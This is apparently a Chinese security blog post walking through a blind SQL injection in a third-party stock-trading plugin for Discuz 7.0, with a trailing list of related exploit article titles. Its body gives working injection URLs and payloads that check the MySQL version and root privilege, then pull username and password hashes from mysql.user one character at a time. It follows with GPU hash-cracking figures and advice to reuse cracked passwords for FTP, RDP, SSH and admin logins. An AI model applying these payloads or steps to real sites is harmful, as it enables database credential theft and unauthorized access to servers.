漏洞的发现来自于对某站的***,由于其discuz版本为7.0,所以我只能把眼光聚焦在了它所安装的第三方插件上。 
经过简单的测试,就发现了《虚拟股市》存在注射漏洞: 
http://www.target.com/plugin.php ... _One&stockid=91 # 91为可变参数 
http://www.target.com/plugin.php ... ser_Show&uid=13 # 13为可变参数 
确认存在注射后开始尝试用order by猜解字段数,然后union select。但两个注射点都在字段数达到一定数目后,所执行的SQL语句发生了变化。原因是插件代码中有控制语句,使其跳转到另一行中执行。这种情况下,我们没办法获得字段数。 
思路有二: 
1.尝试盲注 
2.通过阅读《虚拟股市》这个插件的源码来确认其表结构和字段数 
但经过搜索发现,这个插件的作者在发布时用了zend对其源码进行了加密。而现有所有的解密工具都不是很理想(这也是无法搞清楚漏洞原理和细节的原因)。因此,只能采取盲注的手法(对我而言)。 
盲注费时间是没办法的,但我们会想,盲注能获得哪些信息呢?我的方法如下: 
#判断MYSQL版本,返回正常则为5,返回不正常则继续测试是否为4 
/plugin.php?identifier=stock&module=stock&action=User_Show&uid=13 and substring(@@version,1,1)=5 
#是否支持子查询(版本为4的情况下) 
/plugin.php?identifier=stock&module=stock&action=User_Show&uid=13 and (select 1)=1 
#当前用户是否为root 
/plugin.php?identifier=stock&module=stock&action=User_Show&uid=13 and (select 1 from mysql.user limit 0,1)=1 
下面就根据情况而异了: 
1. 假如数据库用户为root,则可以直接取出root密码HASH,然后破解。如果对方服务器3306开放,或者装有phpmyadmin,那么下一步不用说相信大家也知道了。如果没有开放3306,也没有安装phpmyadmin,那么可以用破解出来的密码猜测一下ftp密码,3389密码,或者SSH密码,又或者后台管理员密码,等等。 
2.假如数据库用户不为root,则直接取出discuz用户表cdb_members的管理员密码HASH,然后破解。 
#######取数据 
#mysql.user表第一行第一个字符的ASCII值是否大于80 
and ascii(substring((SELECT concat(username,0x3a,password) from mysql.user limit 0,1),1,1))>80 
#第二个字符的ASCII值是否大于90 
and ascii(substring((SELECT concat(username,0x3a,password) from mysql.user limit 0,1),2,1))>90 
………… 
就这样逐个猜,MYSQL4的密码HASH为16位MD5加密,MYSQL5的密码HASH为41位(加*号)。 
密码破解: 
1.MYSQL版本为4的话,这里有工具www.sqlhack.com,这个工具利用的是一个传说中的BUG,速度爆快。 
2.MYSQL 版本为5的话,我推荐用ighashgpu进行破解(貌似只用GPU,不用CPU),我AMD4核+HD 4650显卡,破解速度为60M/s,放到Inter Core i7 8核 + NVIDIA GeForce 9800GTX+平台上,速度是70M/s。而用passwordpro,速度才170w/s,这就是差距。7位纯字母我只用了7分多钟就破出来了。 
针对当时环境,我所能想到的利用办法就是这样了。如果有其他漏洞,或许可以更好的结合起来利用,从而达到一击必杀。最后,欢迎各位爱好***的朋友不吝赐教 :) 
参考: 
1.《Full SQL Injection Tutorial (MySQL)》
2. 伟大的google 

Discuz插件《虚拟股市》blind Injection注入漏洞利用相关推荐

  1. Discuz 7.2 /faq.php SQL注入漏洞

    测试方法: 提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! Discuz 7.2 /faq.php SQL注入漏洞 http://www.xxx.com/faq.php?actio ...

  2. Discuz!uc.key泄露导致代码注入漏洞uc.php的解决方法

    漏洞名称:Discuz uc.key泄露导致代码注入漏洞 漏洞描述:在Discuz中,uc_key是UC客户端与服务端通信的通信密钥,discuz中的/api/uc.php存在代码写入漏洞,导致黑客可 ...

  3. /plus/recommend.php sql注入漏洞,DedeCMS 全版本通杀SQL注入漏洞利用代码及工具 -

    DedeCMS 全版本通杀SQL注入漏洞利用代码及工具 目前官方最新版已修复该漏洞 V5.7.37 GBK正式版20140228常规更新补丁 http://www.dedecms.com/pl/ ht ...

  4. Hack The Box - Catch 利用let chat API查询信息,Cachet配置泄露漏洞获取ssh登录密码,apk代码注入漏洞利用获取root权限

    Hack The Box-Catch Hack The Box开始使用流程看这篇 文章目录 Hack The Box-Catch 整体思路 1.Nmap扫描 2.apk文件信息收集 3.lets ch ...

  5. SQL注入——SQL注入漏洞利用(零)(值得收藏)

    一.什么是SQL注入漏洞 攻击者利用Web应用程序对用户输入验证上的疏忽,在输入的数据中包含对某些数据库系 统有特殊意义的符号或命令,让攻击者有机会直接对后台数据库系统下达指令,进而实现对后 台数据库 ...

  6. 命令执行漏洞-命令执行-漏洞位点- 代码注入-漏洞利用-联合执行-Bypass(空格,关键字过滤,变量绕过)-例题两道-actf2020exec-GXYCTF2019 Ping Ping Ping

    命令执行 命令执行是一种攻击,其目标是通过易受攻击的应用程序在主机操作系统上执行任意命令.当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数. 比如PHP中的system,e ...

  7. discuz 7.2 /faq.php sql注入漏洞,Python写的Discuz7.2版faq.php注入漏洞工具

    Discuz 7.2 faq.php全自动利用工具,getshell 以及dump数据,python 版的uc_key getshell部分的代码来自网上(感谢作者) 实现代码: #!/usr/bin ...

  8. mysql limit sql注入_LIMIT子句中的盲 SQL注入漏洞利用

    原文:https://www.noob.ninja/2019/07/exploiting-tricky-blind-sql-injection.html 前言 嘿!有好长时间没有更新过博客了,不知道大 ...

  9. 动网论坛8.2经典注入漏洞利用

    一.实验目的 理解动网论坛8.2原理 二.实验原理 动网论坛用户登录过程中,过滤不严,导致注入,提升权限.漏洞存在源文件的login.asp中. 三.实验环境 本机:192.168.1.2 目标机:1 ...

最新文章

  1. Linux0.11内核引导启动过程概述
  2. csgo怎么通过人机验证_让你的MacBook Pro完美运行CSGO!(图解版)
  3. Troubleshooting Open Cursor Issues
  4. mosn 中的context、变量 和 内存复用机制
  5. 【LeetCode】3. Longest Substring Without Repeating Characters
  6. 复习深入笔记02:魔法方法/cookie,session,token/异常
  7. SQLServer之创建非聚集索引 1
  8. 信息奥赛一本通(1231:最小新整数)
  9. css 实现16:9比例自适应手机尺寸,可设置任意比例
  10. Google 究竟是不是要用 Fuchsia OS 取代 Android?
  11. [转载]IEEE754标准的浮点数表示
  12. 央妈:银联,想说爱你不容易
  13. 最佳eclipse字体推荐(个人认为)
  14. uni-app横屏设置
  15. GUI学习笔记——04更改背景板颜色,鼠标进入事件
  16. windows phone的那些应用们 有意思的,good design的,有用的...
  17. 燃尽图 (Burn up and Burn down Chart)—介绍
  18. 日历控件(bootstrap-datetimepicker.js)
  19. startwith的使用方法
  20. Oracle EBS财务模块(三)总账功能

热门文章

  1. Swift Xcode12.0如何使用Carthage管理iOS依赖库
  2. 【Luogu_P2945】Sand Castle S
  3. DB2中常见sqlCode原因分析
  4. 第十四届蓝桥杯三月真题刷题训练——第 4 天
  5. 谈论 ModSecurity 和新的 Coraza WAF
  6. Tableau仪表盘搭建——外卖数据分析
  7. 计算机网络学习笔记(七):网络安全
  8. Linux 学习笔记(八):时间片轮转调度
  9. 虚拟机VMware9上网设置
  10. 一个Python猜字小游戏